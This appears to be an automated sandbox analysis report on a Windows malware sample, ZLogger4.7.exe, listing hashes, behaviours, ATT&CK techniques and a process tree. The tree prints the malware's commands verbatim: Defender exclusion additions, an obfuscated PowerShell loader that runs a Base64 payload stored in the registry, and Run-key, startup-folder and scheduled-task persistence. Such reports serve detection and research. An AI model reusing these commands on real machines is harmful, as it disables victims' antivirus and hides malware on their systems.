Analysis
- max time kernel: 1799s
- max time network: 1169s
- platform: windows10-2004_x64
- resource: win10v2004-20231025-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231025-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 25-11-2023 14:46
Behavioral task behavioral1
- Sample: ZLogger4.7.exe
- Resource: win7-20231020-en
Behavioral task behavioral2
- Sample: ZLogger4.7.exe
- Resource: win10v2004-20231025-en
General
- Target: ZLogger4.7.exe
- Size: 79.0MB
- MD5: d0146ba4a2389891791ef2f1c0ac7a1c
- SHA1: d101f0319da6dae09d406a7b0227b5e95725e16c
- SHA256: 9236a756a4f1d70338c934f0a0f0be119d6cc7319ee73a44a416cd2f17064987
- SHA512: 130a48c2edc56c56d77d8197a34a6af4b6764f69ab590599c697da1387deb3fda092571d55c85a3e76d3dd5c23ed64c53676d57b395ea5ee64576b93a0ea6400
- SSDEEP: 1572864:02MmiJR5QYHJiXGSk8IpG7V+VPhqoHZE7xHp5tWWfsnghowmaOllIWgawuBeWBg6:0ZmCxp0GSkB05awoHYJjlmghfxOllIR5
Malware Config
Signatures
-
Enumerates VirtualBox DLL files 2 TTPs 4 IoCs
Processes: ZLogger4.7.exe, ZLoggerV4.7.exe
description | ioc | process
File opened (read-only) | C:\windows\system32\vboxhook.dll | ZLogger4.7.exe
File opened (read-only) | C:\windows\system32\vboxmrxnp.dll | ZLogger4.7.exe
File opened (read-only) | C:\windows\system32\vboxhook.dll | ZLoggerV4.7.exe
File opened (read-only) | C:\windows\system32\vboxmrxnp.dll | ZLoggerV4.7.exe
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: ZLoggerV4.7.exe, cmd.exe, WScript.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | ZLoggerV4.7.exe
Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | WScript.exe
-
Drops startup file 4 IoCs
Processes: powershell.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.vbs | powershell.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.vbs | powershell.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClie1nt.lnk | powershell.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClie1nt.lnk | powershell.exe
-
Executes dropped EXE 3 IoCs
Processes: ZLoggerV4.7.exe, ZLoggerV4.7.exe, XClie1nt.exe
pid | process
1980 | ZLoggerV4.7.exe
4356 | ZLoggerV4.7.exe
4328 | XClie1nt.exe
-
Loads dropped DLL 64 IoCs
Processes: ZLogger4.7.exe
pid | process
2088 | ZLogger4.7.exe
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes: ZLogger4.7.exe, powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BoolCheck = "C:\\Users\\Admin\\AMSIIntegrity\\ZLoggerV4.7.exe" | ZLogger4.7.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClie1nt = "C:\\Users\\Admin\\XClie1nt.exe" | powershell.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes: ipconfig.exe, ipconfig.exe
pid | process
3376 | ipconfig.exe
840 | ipconfig.exe
-
Kills process with taskkill 1 IoCs
Processes: taskkill.exe
pid | process
2216 | taskkill.exe
-
Modifies registry class 2 IoCs
Processes: ZLoggerV4.7.exe, cmd.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings | ZLoggerV4.7.exe
Key created | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings | cmd.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: vlc.exe
pid | process
2956 | vlc.exe
-
Suspicious behavior: EnumeratesProcesses 54 IoCs
Processes: ZLogger4.7.exe, powershell.exe, ZLoggerV4.7.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, XClie1nt.exe
pid | process
2088 | ZLogger4.7.exe
2576 | powershell.exe
4356 | ZLoggerV4.7.exe
1716 | powershell.exe
3684 | powershell.exe
1832 | powershell.exe
3792 | powershell.exe
2388 | powershell.exe
400 | powershell.exe
4328 | XClie1nt.exe
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes: ZLoggerV4.7.exe, vlc.exe
pid | process
4356 | ZLoggerV4.7.exe
2956 | vlc.exe
-
Suspicious use of AdjustPrivilegeToken 58 IoCs
Processes: ZLogger4.7.exe, powershell.exe, taskkill.exe, ZLoggerV4.7.exe, powershell.exe, WMIC.exe, AUDIODG.EXE, vlc.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, XClie1nt.exe
description | pid | process
Token: SeDebugPrivilege | 2088 | ZLogger4.7.exe
Token: SeDebugPrivilege | 2576 | powershell.exe
Token: SeDebugPrivilege | 2216 | taskkill.exe
Token: SeDebugPrivilege | 4356 | ZLoggerV4.7.exe
Token: SeDebugPrivilege | 1716 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 224 | WMIC.exe
Token: SeSecurityPrivilege | 224 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 224 | WMIC.exe
Token: SeLoadDriverPrivilege | 224 | WMIC.exe
Token: SeSystemProfilePrivilege | 224 | WMIC.exe
Token: SeSystemtimePrivilege | 224 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 224 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 224 | WMIC.exe
Token: SeCreatePagefilePrivilege | 224 | WMIC.exe
Token: SeBackupPrivilege | 224 | WMIC.exe
Token: SeRestorePrivilege | 224 | WMIC.exe
Token: SeShutdownPrivilege | 224 | WMIC.exe
Token: SeDebugPrivilege | 224 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 224 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 224 | WMIC.exe
Token: SeUndockPrivilege | 224 | WMIC.exe
Token: SeManageVolumePrivilege | 224 | WMIC.exe
Token: 33 | 224 | WMIC.exe
Token: 34 | 224 | WMIC.exe
Token: 35 | 224 | WMIC.exe
Token: 36 | 224 | WMIC.exe
Token: 33 | 3448 | AUDIODG.EXE
Token: SeIncBasePriorityPrivilege | 3448 | AUDIODG.EXE
Token: 33 | 2956 | vlc.exe
Token: SeIncBasePriorityPrivilege | 2956 | vlc.exe
Token: SeDebugPrivilege | 3684 | powershell.exe
Token: SeDebugPrivilege | 1832 | powershell.exe
Token: SeDebugPrivilege | 3792 | powershell.exe
Token: SeDebugPrivilege | 2388 | powershell.exe
Token: SeDebugPrivilege | 400 | powershell.exe
Token: SeDebugPrivilege | 4328 | XClie1nt.exe
-
Suspicious use of FindShellTrayWindow 25 IoCs
Processes: vlc.exe
pid | process
2956 | vlc.exe
-
Suspicious use of SendNotifyMessage 8 IoCs
Processes: vlc.exe
pid | process
2956 | vlc.exe
-
Suspicious use of SetWindowsHookEx 6 IoCs
Processes: ZLoggerV4.7.exe, vlc.exe, powershell.exe
pid | process
4356 | ZLoggerV4.7.exe
2956 | vlc.exe
3684 | powershell.exe
-
Suspicious use of WriteProcessMemory 62 IoCs
Processes: ZLogger4.7.exe, ZLogger4.7.exe, cmd.exe, ZLoggerV4.7.exe, ZLoggerV4.7.exe, cmd.exe, cmd.exe, cmd.exe, WScript.exe, powershell.exe, XClie1nt.exe
description | pid | process | target process
PID 4896 wrote to memory of 2088 | 4896 | ZLogger4.7.exe | ZLogger4.7.exe
PID 2088 wrote to memory of 5012 | 2088 | ZLogger4.7.exe | cmd.exe
PID 2088 wrote to memory of 2576 | 2088 | ZLogger4.7.exe | powershell.exe
PID 2088 wrote to memory of 2236 | 2088 | ZLogger4.7.exe | cmd.exe
PID 2236 wrote to memory of 2844 | 2236 | cmd.exe | attrib.exe
PID 2236 wrote to memory of 1980 | 2236 | cmd.exe | ZLoggerV4.7.exe
PID 2236 wrote to memory of 2216 | 2236 | cmd.exe | taskkill.exe
PID 1980 wrote to memory of 4356 | 1980 | ZLoggerV4.7.exe | ZLoggerV4.7.exe
PID 4356 wrote to memory of 5092 | 4356 | ZLoggerV4.7.exe | cmd.exe
PID 4356 wrote to memory of 1716 | 4356 | ZLoggerV4.7.exe | powershell.exe
PID 4356 wrote to memory of 3520 | 4356 | ZLoggerV4.7.exe | cmd.exe
PID 3520 wrote to memory of 224 | 3520 | cmd.exe | WMIC.exe
PID 4356 wrote to memory of 5024 | 4356 | ZLoggerV4.7.exe | cmd.exe
PID 4356 wrote to memory of 2956 | 4356 | ZLoggerV4.7.exe | vlc.exe
PID 4356 wrote to memory of 2128 | 4356 | ZLoggerV4.7.exe | cmd.exe
PID 2128 wrote to memory of 3376 | 2128 | cmd.exe | ipconfig.exe
PID 4356 wrote to memory of 2880 | 4356 | ZLoggerV4.7.exe | cmd.exe
PID 4356 wrote to memory of 2864 | 4356 | ZLoggerV4.7.exe | cmd.exe
PID 4356 wrote to memory of 4660 | 4356 | ZLoggerV4.7.exe | cmd.exe
PID 4356 wrote to memory of 2268 | 4356 | ZLoggerV4.7.exe | cmd.exe
PID 4356 wrote to memory of 4120 | 4356 | ZLoggerV4.7.exe | cmd.exe
PID 4356 wrote to memory of 4924 | 4356 | ZLoggerV4.7.exe | cmd.exe
PID 4356 wrote to memory of 1504 | 4356 | ZLoggerV4.7.exe | cmd.exe
PID 1504 wrote to memory of 3816 | 1504 | cmd.exe | WScript.exe
PID 3816 wrote to memory of 3684 | 3816 | WScript.exe | powershell.exe
PID 3684 wrote to memory of 1832 | 3684 | powershell.exe | powershell.exe
PID 3684 wrote to memory of 3792 | 3684 | powershell.exe | powershell.exe
PID 3684 wrote to memory of 2388 | 3684 | powershell.exe | powershell.exe
PID 3684 wrote to memory of 400 | 3684 | powershell.exe | powershell.exe
PID 3684 wrote to memory of 3744 | 3684 | powershell.exe | schtasks.exe
PID 4328 wrote to memory of 840 | 4328 | XClie1nt.exe | ipconfig.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
- C:\Users\Admin\AppData\Local\Temp\ZLogger4.7.exe (PID 4896)
  Command line: "C:\Users\Admin\AppData\Local\Temp\ZLogger4.7.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\ZLogger4.7.exe (PID 2088)
    Command line: "C:\Users\Admin\AppData\Local\Temp\ZLogger4.7.exe"
    Signatures: Enumerates VirtualBox DLL files; Loads dropped DLL; Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe (PID 5012)
      Command line: C:\Windows\system32\cmd.exe /c "ver"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2576)
      Command line: powershell -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\AMSIIntegrity\""
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\cmd.exe (PID 2236)
      Command line: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AMSIIntegrity\activate.bat
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\attrib.exe (PID 2844)
        Command line: attrib +s +h .
        Signatures: Sets file to hidden; Views/modifies file attributes
      - C:\Users\Admin\AMSIIntegrity\ZLoggerV4.7.exe (PID 1980)
        Command line: "ZLoggerV4.7.exe"
        Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
        - C:\Users\Admin\AMSIIntegrity\ZLoggerV4.7.exe (PID 4356)
          Command line: "ZLoggerV4.7.exe"
          Signatures: Enumerates VirtualBox DLL files; Checks computer location settings; Executes dropped EXE; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
          - C:\Windows\system32\cmd.exe (PID 5092)
            Command line: C:\Windows\system32\cmd.exe /c "ver"
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1716)
            Command line: powershell -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\AMSIIntegrity\""
            Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          - C:\Windows\system32\cmd.exe (PID 3520)
            Command line: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Signatures: Suspicious use of WriteProcessMemory
            - C:\Windows\System32\Wbem\WMIC.exe (PID 224)
              Command line: wmic csproduct get uuid
              Signatures: Suspicious use of AdjustPrivilegeToken
          - C:\Windows\system32\cmd.exe (PID 5024)
            Command line: C:\Windows\system32\cmd.exe /c "del C:\Users\Admin\AMSIIntegrity\ss.png"
          - C:\Program Files\VideoLAN\VLC\vlc.exe (PID 2956)
            Command line: "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\jumpscare.mp4"
            Signatures: Suspicious behavior: AddClipboardFormatListener; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of SetWindowsHookEx
          - C:\Windows\system32\cmd.exe (PID 2128)
            Command line: C:\Windows\system32\cmd.exe /c "ipconfig"
            Signatures: Suspicious use of WriteProcessMemory
            - C:\Windows\system32\ipconfig.exe (PID 3376)
              Command line: ipconfig
              Signatures: Gathers network information
          - C:\Windows\system32\cmd.exe (PID 2880)
            Command line: C:\Windows\system32\cmd.exe /c "del rec_\25.11.2023_14.49.wav"
          - C:\Windows\system32\cmd.exe (PID 2864)
            Command line: C:\Windows\system32\cmd.exe /c "del C:\Users\Admin\AMSIIntegrity\ss.png"
          - C:\Windows\system32\cmd.exe (PID 4660)
            Command line: C:\Windows\system32\cmd.exe /c "del rec_\25.11.2023_14.51.wav"
          - C:\Windows\system32\cmd.exe (PID 2268)
            Command line: C:\Windows\system32\cmd.exe /c "del C:\Users\Admin\AMSIIntegrity\ss.png"
          - C:\Windows\system32\cmd.exe (PID 4120)
            Command line: C:\Windows\system32\cmd.exe /c "del rec_\25.11.2023_14.53.wav"
          - C:\Windows\system32\cmd.exe (PID 4924)
            Command line: C:\Windows\system32\cmd.exe /c "del rec_\25.11.2023_14.55.wav"
          - C:\Windows\system32\cmd.exe (PID 1504)
            Command line: C:\Windows\system32\cmd.exe /c "start "" "C:/Users/Admin/AMSIIntegrity/FUD.vbs""
            Signatures: Checks computer location settings; Modifies registry class; Suspicious use of WriteProcessMemory
            - C:\Windows\System32\WScript.exe (PID 3816)
              Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AMSIIntegrity\FUD.vbs"
              Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
              - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3684)
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AMSIIntegrity\FUD.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.vbs'; $beautyberry = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $beautyberry = -join $beautyberry[-1..-$beautyberry.Length];[<##>AppDomain<##>]::<##>('nonvocationallyurrentDomain'.replace('nonvocationally','C'))<##>.<##>('hexameraload'.replace('hexameral','L'))([Convert]::FromBase64String($beautyberry))<##>.<##>('sextettesntryPoint'.replace('sextettes','E'))<##>.<##>('InDaleaoke'.replace('Dalea','v'))($Null,$Null)<##>;
                Signatures: Drops startup file; Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
                - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1832)
                  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
                - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3792)
                  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
                - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2388)
                  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\XClie1nt.exe'
                  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
                - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 400)
                  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClie1nt.exe'
                  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
                - C:\Windows\System32\schtasks.exe (PID 3744)
                  Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClie1nt" /tr "C:\Users\Admin\XClie1nt.exe"
                  Signatures: Creates scheduled task(s)
      - C:\Windows\system32\taskkill.exe (PID 2216)
        Command line: taskkill /f /im "ZLogger4.7.exe"
        Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\AUDIODG.EXE (PID 3448)
  Command line: C:\Windows\system32\AUDIODG.EXE 0x2f4 0x49c
  Signatures: Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\rundll32.exe (PID 4836)
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
- C:\Users\Admin\XClie1nt.exe (PID 4328)
  Command line: C:\Users\Admin\XClie1nt.exe
  Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\ipconfig.exe (PID 840)
    Command line: "C:\Windows\system32\ipconfig.exe"
    Signatures: Gathers network information
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution 1
- Registry Run Keys / Startup Folder 1
- Scheduled Task/Job 1
Privilege Escalation
- Boot or Logon Autostart Execution 1
- Registry Run Keys / Startup Folder 1
- Scheduled Task/Job 1
Defense Evasion
- Hide Artifacts 2
- Hidden Files and Directories 2
- Modify Registry 1
- Virtualization/Sandbox Evasion 1
-
Filesize
25KB
MD5347d6a8c2d48003301032546c140c145
SHA11a3eb60ad4f3da882a3fd1e4248662f21bd34193
SHA256e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192
SHA512b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06
-
Filesize
43KB
MD51a34253aa7c77f9534561dc66ac5cf49
SHA1fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a
-
Filesize
43KB
MD51a34253aa7c77f9534561dc66ac5cf49
SHA1fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a
-
Filesize
56KB
MD51a8fdc36f7138edcc84ee506c5ec9b92
SHA1e5e2da357fe50a0927300e05c26a75267429db28
SHA2568e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882
SHA512462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0
-
Filesize
65KB
MD5f9cc7385b4617df1ddf030f594f37323
SHA1ebceec12e43bee669f586919a928a1fd93e23a97
SHA256b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA5123f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb
-
Filesize
65KB
MD5f9cc7385b4617df1ddf030f594f37323
SHA1ebceec12e43bee669f586919a928a1fd93e23a97
SHA256b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA5123f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb
-
Filesize
38KB
MD521e05294dd230deee50e5036efad282a
SHA1689747aaac5e2ecb8852507805bc4ae1df63fe10
SHA2561ae9a8d0d41abb9d793ef74c2d78079c12122c779a5403109e6599331d282377
SHA512877be83ad0caa7f9f8b0efeea047c76efec86ed388ba63792d2ef40e257bc86504c84215ff8bd7d1500c5e3b6430b7d5d8d8b1ddd6abb3f50020101cf75bba83
-
Filesize
24KB
MD54faa479423c54d5be2a103b46ecb4d04
SHA1011f6cdbd3badaa5c969595985a9ad18547dd7ec
SHA256c2ad3c1b4333bc388b6a22049c89008505c434b1b85bff0823b19ef0cf48065a
SHA51292d35824c30667af606bba883bf6e275f2a8b5cbfea2e84a77e256d122b91b3ee7e84d9f4e2a4946e903a11293af9648a45e8cfbe247cbdc3bcdea92eb5349c6
-
Filesize
1.4MB
MD532ede00817b1d74ce945dcd1e8505ad0
SHA151b5390db339feeed89bffca925896aff49c63fb
SHA2564a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a
SHA512a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7
-
Filesize
9KB
MD532062fd1796553acac7aa3d62ce4c4a5
SHA10c5e7deb9c11eeaf4799f1a677880fbaf930079c
SHA2564910c386c02ae6b2848d5728e7376c5881c56962d29067005e1e2ad518bc07ae
SHA51218c3b894af9102df8ed15f78e1d3a51db1f07465d814380a0220f0c0571b52292b065aed819004f13aeb343f677ac5bfd5a5a35d6f74e48381228724241f7758
-
Filesize
9KB
MD532062fd1796553acac7aa3d62ce4c4a5
SHA10c5e7deb9c11eeaf4799f1a677880fbaf930079c
SHA2564910c386c02ae6b2848d5728e7376c5881c56962d29067005e1e2ad518bc07ae
SHA51218c3b894af9102df8ed15f78e1d3a51db1f07465d814380a0220f0c0571b52292b065aed819004f13aeb343f677ac5bfd5a5a35d6f74e48381228724241f7758
-
Filesize
39KB
MD51c52efd6568c7d95b83b885632ec7798
SHA1cae9e800292cb7f328105495dd53fc20749741f8
SHA2562b2cad68bec8979fd577d692013a7981fdbc80a5a6e8f517c2467fdcee5d8939
SHA51235e619f996e823f59455b531f1872d7658b299c41e14d91cd13dcef20072971a437884fde4424fd9a10b67a39ea40f48df416ed8b0633aea00022b31709541f2
-
Filesize
292KB
MD5522257e451efcc3bfe980f56d3fed113
SHA1f5e12321517f523842943ea7f3ba74d449dba1f4
SHA2568c74376e7932eebcd084191b40774056b32525ba48e375d942754cdc4fc03c60
SHA512d590cd813281278be4aec86af3713216dd306399b4910221a2447a3200accbca1b5f8d9495bf21f69ff8e09e5465a71c715a85ce0d87cdc26cbf27b0fae2cc4c
-
Filesize
1.6MB
MD578ebd9cb6709d939e4e0f2a6bbb80da9
SHA1ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA2566a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
SHA512b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122
-
Filesize
1.6MB
MD578ebd9cb6709d939e4e0f2a6bbb80da9
SHA1ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA2566a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
SHA512b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122
-
Filesize
29KB
MD508b000c3d990bc018fcb91a1e175e06e
SHA1bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA5128820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf
-
Filesize
29KB
MD508b000c3d990bc018fcb91a1e175e06e
SHA1bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA5128820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf
-
Filesize
108KB
MD56e67e46f957f50215b7e68c9091db53f
SHA1e969fa4858351c95c337352dd0578fe5a83403f0
SHA25624b25fe9ebe303496973c4d11144b053a5f5a03eabf53f9d8eab0c15fdbfbffe
SHA51286af5560269ef21490f5343ea3e0522f35e271d42e64f61a2f05471302856de79d34bf00658e1667d7145af48667627fa3897bca2fc479928ab9a62ecba81396
-
Filesize
117KB
MD5072093b2671589d4ce465de2b92ebee4
SHA1821d9827286271859640984df28e01b4a37341fb
SHA25604d07b4dcae8d3998156d563df20881ba790c32389aca23ade91de9cf9f4a3d4
SHA512522d5faa8d17017f1891374a23d6e653cd62b51818734bf1f7343248d09e1e314ae49821595818fe69af62c9e51debca4ae384e421ad8fa658aced95f977379e
-
Filesize
16KB
MD56ffebd7d283079e9029c7f29d8ca7fba
SHA1b470b09c8aa2f3e42bcff8392d95b6259cb87555
SHA2560d9a915ea29ed4da271f86dbcfa90b52064a26b5136af590b2bb430d5dd6a67e
SHA5122b9a9b5f298eefccf0a08af52d7c2c803db19ab9f3cedad2bb19df50466527c05e31f956b6018c9a337565448249465eba8952e9e8397b728b7f76e4f0561c68
-
Filesize
181KB
MD53c2e93c3d2b292a0f489449209f8e099
SHA1751f18a79c6da4e7162439cef4d481189d17a242
SHA256b6b32593c0bcecea7b31a900086870bbab039f25b29067170ac461cf2479dea5
SHA512a0ec68d2a1c650720b4e3e437a5841e8d04d165fc920ce26a41cc20d6ddf4c761b05bbf3426e241c2ee13a9fbe146fc889aa45df70397600b2d962bdaa1bedbb
-
Filesize
217KB
MD517bed62f3389d532d3dfc59071bbd214
SHA12b0894cc48dd3756f0ff6602bf8c1e24cb8b6642
SHA2564fd26640721088ac31fdac941db6fa3c094ca17bd97d240992969aefae19ff91
SHA512976c5e0dd50487eb5f88c195633805cccbf34566496065eaf8f3ecbbea0300653097bfbbf628dbb2c238a4d552460187794bcebcb8d41452a3f873f0244fc6a4
-
Filesize
26KB
MD5a729c1b14d695b00ae79472d3fe45339
SHA120cd334187fc7297138f014303e5c82b5f918c80
SHA25657bb8b7dec2bd35ff1031f12c4ba3aa3cb2e8de2445e21ea29ffa3ad13e7be3a
SHA5121da8060b1767bdf811b005e4a476c18f1c2f93186334aa40ca59937cec7aed37267c45a3b5aaeb8fa13d9b0639959d128d957e6d08fcb9787926df850e42fc22
-
Filesize
98KB
MD58f3bf615136b7241204419fb24c8d5ad
SHA1d107f0b405c566974c37be20e1abbd365ccbb750
SHA256a9c4d2443d6de90091eff8a5adfd7a3c207b0c7aefb913b855320866e93f8039
SHA512a2ced7974c086291e69dce39f841335c771088aecbbc52b049d7af51c81342bd1e8bd0d8c78e62529e2041d15d8f5317e5a41727e299c2d827027bcbb0382aa1
-
Filesize
223KB
MD5bf4a722ae2eae985bacc9d2117d90a6f
SHA13e29de32176d695d49c6b227ffd19b54abb521ef
SHA256827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147
SHA512dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73
-
Filesize
223KB
